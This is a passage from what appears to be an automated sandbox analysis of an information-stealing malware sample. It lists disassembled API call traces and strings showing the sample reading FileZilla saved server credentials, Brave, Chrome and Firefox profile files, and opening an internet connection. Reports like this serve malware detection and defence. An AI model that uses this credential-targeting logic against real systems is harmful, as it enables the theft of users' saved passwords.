                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 2635522530-726946144
                            • Opcode ID: 8dd82fb5779f4737a56e41939b4ec9eba76ac2a9fe9b15033675cdd8128c9009
                            • Instruction ID: 95f0fc8eb21e2703fa70e619154e494707d2cc4a6e9fa041821d9e5d5f534846
                            • Opcode Fuzzy Hash: 8dd82fb5779f4737a56e41939b4ec9eba76ac2a9fe9b15033675cdd8128c9009
                            • Instruction Fuzzy Hash: 5E92C071A012069FCB20EF75DD89AAF77B9AF08304F14652AF845A3391DB78DC058BA4
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004418D2
                            • lstrlen.KERNEL32(\*.*), ref: 004418DD
                            • lstrcpy.KERNEL32(00000000,?), ref: 004418FF
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 0044190B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441932
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00441947
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 00441967
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 00441981
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004419BF
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004419F2
                            • lstrcpy.KERNEL32(00000000,?), ref: 00441A1A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00441A25
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441A4C
                            • lstrlen.KERNEL32(00461794), ref: 00441A5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441A80
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00441A8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441AB4
                            • lstrlen.KERNEL32(?), ref: 00441AC8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441AE5
                            • lstrcat.KERNEL32(00000000,?), ref: 00441AF3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441B19
                            • lstrlen.KERNEL32(00FF9110), ref: 00441B2F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441B59
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00441B64
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441B8F
                            • lstrlen.KERNEL32(00461794), ref: 00441BA1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441BC3
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00441BCF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441BF8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441C25
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00441C30
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441C57
                            • lstrlen.KERNEL32(00461794), ref: 00441C69
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441C8B
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00441C97
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441CC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441CEF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00441CFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441D21
                            • lstrlen.KERNEL32(00461794), ref: 00441D33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441D55
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00441D61
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441D8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441DB9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00441DC4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441DED
                            • lstrlen.KERNEL32(00461794), ref: 00441E19
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441E36
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00441E42
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441E68
                            • lstrlen.KERNEL32(00FFDDE0), ref: 00441E7E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441EB2
                            • lstrlen.KERNEL32(00461794), ref: 00441EC6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441EE3
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00441EEF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441F15
                            • lstrlen.KERNEL32(00FFE330), ref: 00441F2B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441F5F
                            • lstrlen.KERNEL32(00461794), ref: 00441F73
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441F90
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00441F9C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441FC2
                            • lstrlen.KERNEL32(00FEA698), ref: 00441FD8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00442000
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0044200B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00442036
                            • lstrlen.KERNEL32(00461794), ref: 00442048
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00442067
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00442073
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00442098
                            • lstrlen.KERNEL32(?), ref: 004420AC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004420D0
                            • lstrcat.KERNEL32(00000000,?), ref: 004420DE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00442103
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044213F
                            • lstrlen.KERNEL32(00FFDC48), ref: 0044214E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00442176
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00442181
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                            • String ID: \*.*
                            • API String ID: 712834838-1173974218
                            • Opcode ID: d2712563ecf9e06139c3f7cc3f011b8bce1b4c319ce6c04eb1d4960ae7f07588
                            • Instruction ID: e17e902a9223d70404b2dae523a76d29e861a548a64d7daa00db1859158b83b2
                            • Opcode Fuzzy Hash: d2712563ecf9e06139c3f7cc3f011b8bce1b4c319ce6c04eb1d4960ae7f07588
                            • Instruction Fuzzy Hash: F162E770A116169BDB21EF75CD48AAFB7BAAF44704F04112AF80593361DBBCDD41CBA8
                            APIs
                            • wsprintfA.USER32 ref: 0044392C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00443943
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 0044396C
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 00443986
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004439BF
                            • lstrcpy.KERNEL32(00000000,?), ref: 004439E7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004439F2
                            • lstrlen.KERNEL32(00461794), ref: 004439FD
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443A1A
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00443A26
                            • lstrlen.KERNEL32(?), ref: 00443A33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443A53
                            • lstrcat.KERNEL32(00000000,?), ref: 00443A61
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443A8A
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00443ACE
                            • lstrlen.KERNEL32(?), ref: 00443AD8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443B05
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00443B10
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443B36
                            • lstrlen.KERNEL32(00461794), ref: 00443B48
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443B6A
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00443B76
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443B9E
                            • lstrlen.KERNEL32(?), ref: 00443BB2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443BD2
                            • lstrcat.KERNEL32(00000000,?), ref: 00443BE0
                            • lstrlen.KERNEL32(00FF91A0), ref: 00443C0B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443C31
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00443C3C
                            • lstrlen.KERNEL32(00FF9110), ref: 00443C5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443C84
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00443C8F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443CB7
                            • lstrlen.KERNEL32(00461794), ref: 00443CC9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443CE8
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00443CF4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443D1A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00443D47
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00443D52
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443D79
                            • lstrlen.KERNEL32(00461794), ref: 00443D8B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443DAD
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00443DB9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443DE2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443E11
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00443E1C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443E43
                            • lstrlen.KERNEL32(00461794), ref: 00443E55
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443E77
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00443E83
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443EAC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443EDB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00443EE6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443F0D
                            • lstrlen.KERNEL32(00461794), ref: 00443F1F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443F41
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00443F4D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443F75
                            • lstrlen.KERNEL32(?), ref: 00443F89
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443FA9
                            • lstrcat.KERNEL32(00000000,?), ref: 00443FB7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443FE0
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044401F
                            • lstrlen.KERNEL32(00FFDC48), ref: 0044402E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444056
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00444061
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044408A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004440CE
                            • lstrcat.KERNEL32(00000000), ref: 004440DB
                            • FindNextFileA.KERNEL32(00000000,?), ref: 004442D9
                            • FindClose.KERNEL32(00000000), ref: 004442E8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 1006159827-1013718255
                            • Opcode ID: aff4fb7cb23aa9ec641a734730bd7271d65ee18f3d1a49391ec9b6c31bda16a7
                            • Instruction ID: 1aa0188be96b6cd6bf9ead208c40a035fef9e3ed7d81309276bdc25f90fe3eea
                            • Opcode Fuzzy Hash: aff4fb7cb23aa9ec641a734730bd7271d65ee18f3d1a49391ec9b6c31bda16a7
                            • Instruction Fuzzy Hash: BA62D371A116169BDB21EF75CD48BAFB7BAAF44705F04512AF801A3350DBB8DD01CBA8
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00446995
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 004469C8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446A02
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446A29
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00446A34
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446A5D
                            • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00446A77
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446A99
                            • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00446AA5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446AD0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446B00
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00446B35
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00446B9D
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00446BCD
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 313953988-555421843
                            • Opcode ID: 0ea40be201f0c23df33a792ddaf31f647ef3270beb5ce9074c408de16d25bd9c
                            • Instruction ID: fe50eeffb96fef8eeef6ad944ea7ae41dbd7207c19928ca7ffc22653682e3dcb
                            • Opcode Fuzzy Hash: 0ea40be201f0c23df33a792ddaf31f647ef3270beb5ce9074c408de16d25bd9c
                            • Instruction Fuzzy Hash: 6E42D371A00305AFDB11ABB1CD89BAFB7BAAF05704F15641AF801E7251DBB8DD018B69
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043DBC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DBE4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043DBEF
                            • lstrlen.KERNEL32(00464CA8), ref: 0043DBFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DC17
                            • lstrcat.KERNEL32(00000000,00464CA8), ref: 0043DC23
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DC4C
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043DC8F
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043DCBF
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 0043DCD0
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 0043DCF0
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 0043DD0A
                            • lstrlen.KERNEL32(0045CFEC), ref: 0043DD1D
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043DD47
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DD70
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043DD7B
                            • lstrlen.KERNEL32(00461794), ref: 0043DD86
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DDA3
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043DDAF
                            • lstrlen.KERNEL32(?), ref: 0043DDBC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DDDF
                            • lstrcat.KERNEL32(00000000,?), ref: 0043DDED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DE19
                            • lstrlen.KERNEL32(00461794), ref: 0043DE3D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043DE6F
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043DE7B
                            • lstrlen.KERNEL32(00FF9370), ref: 0043DE8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DEB0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043DEBB
                            • lstrlen.KERNEL32(00461794), ref: 0043DEC6
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043DEE6
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043DEF2
                            • lstrlen.KERNEL32(00FF91B0), ref: 0043DF01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DF27
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043DF32
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DF5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DFA5
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043DFB1
                            • lstrlen.KERNEL32(00FF9370), ref: 0043DFC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DFE9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043DFF4
                            • lstrlen.KERNEL32(00461794), ref: 0043DFFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E022
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043E02E
                            • lstrlen.KERNEL32(00FF91B0), ref: 0043E03D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E063
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043E06E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E09A
                            • StrCmpCA.SHLWAPI(?,Brave), ref: 0043E0CD
                            • StrCmpCA.SHLWAPI(?,Preferences), ref: 0043E0E7
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043E11F
                            • lstrlen.KERNEL32(00FFDC48), ref: 0043E12E
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E155
                            • lstrcat.KERNEL32(00000000,?), ref: 0043E15D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E19F
                            • lstrcat.KERNEL32(00000000), ref: 0043E1A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E1D0
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0043E1F9
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043E22F
                            • lstrlen.KERNEL32(00FF91A0), ref: 0043E23D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E261
                            • lstrcat.KERNEL32(00000000,00FF91A0), ref: 0043E269
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0043E988
                            • FindClose.KERNEL32(00000000), ref: 0043E997
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                            • String ID: Brave$Preferences$\Brave\Preferences
                            • API String ID: 1346089424-1230934161
                            • Opcode ID: 705b1e4a5929bc6d093db0111ed2546987cbd3ecb272ad8d92447c651e76d01e
                            • Instruction ID: ddb2c6715082b103938203766d0afaa719c3a08e66ce5b20de1fde0dd892984d
                            • Opcode Fuzzy Hash: 705b1e4a5929bc6d093db0111ed2546987cbd3ecb272ad8d92447c651e76d01e
                            • Instruction Fuzzy Hash: B8529071A113069FCB21EF75DD89AAF77B9AF08304F14612AF84597351DBB8DC018BA8
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 004360FF
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00436152
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00436185
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004361B5
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004361F0
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00436223
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00436233
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: 557752db0af80c2e3febffaeb078440f63e9262c626af2039cc9a25cb61d412c
                            • Instruction ID: 6f4effe6f18e19869b35e31ffdb477d6bc3940163f57fcab66d55546ca231b49
                            • Opcode Fuzzy Hash: 557752db0af80c2e3febffaeb078440f63e9262c626af2039cc9a25cb61d412c
                            • Instruction Fuzzy Hash: F9527071A10216AFCB21EFB5DC45B9F77B9AF48304F15A12AF805A7251DB78DC01CBA8
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00446B9D
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00446BCD
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00446BFD
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00446C2F
                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00446C3C
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00446C43
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00446C5A
                            • lstrlen.KERNEL32(00000000), ref: 00446C65
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446CA8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446CCF
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 00446CE2
                            • lstrlen.KERNEL32(00000000), ref: 00446CED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446D30
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446D57
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00446D6A
                            • lstrlen.KERNEL32(00000000), ref: 00446D75
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446DB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446DDF
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00446DF2
                            • lstrlen.KERNEL32(00000000), ref: 00446E01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446E49
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446E71
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00446E94
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00446EA8
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00446EC9
                            • LocalFree.KERNEL32(00000000), ref: 00446ED4
                            • lstrlen.KERNEL32(?), ref: 00446F6E
                            • lstrlen.KERNEL32(?), ref: 00446F81
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 2641759534-2314656281
                            • Opcode ID: a722c3f32dd671ac02bdadf523a2895b9ee001db9f23f3024d68664e54ff42db
                            • Instruction ID: 2d8022eb2613e80a387570e111a6c21e5e68febaa690fc4b5d6ca04d2b3ecfa6
                            • Opcode Fuzzy Hash: a722c3f32dd671ac02bdadf523a2895b9ee001db9f23f3024d68664e54ff42db
                            • Instruction Fuzzy Hash: A502B171A00315AFDB10ABB1CD89B9F7BBAAF09704F15241AF801E7351DBB8DD018B69
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00444B51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444B74
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00444B7F
                            • lstrlen.KERNEL32(00464CA8), ref: 00444B8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444BA7
                            • lstrcat.KERNEL32(00000000,00464CA8), ref: 00444BB3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444BDE
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00444BFA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: prefs.js
                            • API String ID: 2567437900-3783873740
                            • Opcode ID: 40cbbb5afb9aa5a9c8d4086e0a33c60e70a6b1d2f1f8c5a95737d82124e329cb
                            • Instruction ID: 25fc98698e3990b1dd425a69329ce69ae00916bf8ae978ee05b17d0be8d24ea5
                            • Opcode Fuzzy Hash: 40cbbb5afb9aa5a9c8d4086e0a33c60e70a6b1d2f1f8c5a95737d82124e329cb
                            • Instruction Fuzzy Hash: 35924F70A01601CFEF24DF29C948B6AB7E5AF45314F2980AEE8099B3A2D779DC41CB54
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00441291
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004412B4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004412BF
                            • lstrlen.KERNEL32(00464CA8), ref: 004412CA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004412E7
                            • lstrcat.KERNEL32(00000000,00464CA8), ref: 004412F3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044131E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 0044133A
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 0044135C
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 00441376
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004413AF
                            • lstrcpy.KERNEL32(00000000,?), ref: 004413D7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004413E2
                            • lstrlen.KERNEL32(00461794), ref: 004413ED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044140A
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00441416
                            • lstrlen.KERNEL32(?), ref: 00441423
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441443
                            • lstrcat.KERNEL32(00000000,?), ref: 00441451
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044147A
                            • StrCmpCA.SHLWAPI(?,00FFDDB0), ref: 004414A3
                            • lstrcpy.KERNEL32(00000000,?), ref: 004414E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044150D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441535
                            • StrCmpCA.SHLWAPI(?,00FFE390), ref: 00441552
                            • lstrcpy.KERNEL32(00000000,?), ref: 00441593
                            • lstrcpy.KERNEL32(00000000,?), ref: 004415BC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004415E4
                            • StrCmpCA.SHLWAPI(?,00FFDD38), ref: 00441602
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441633
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044165C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00441685
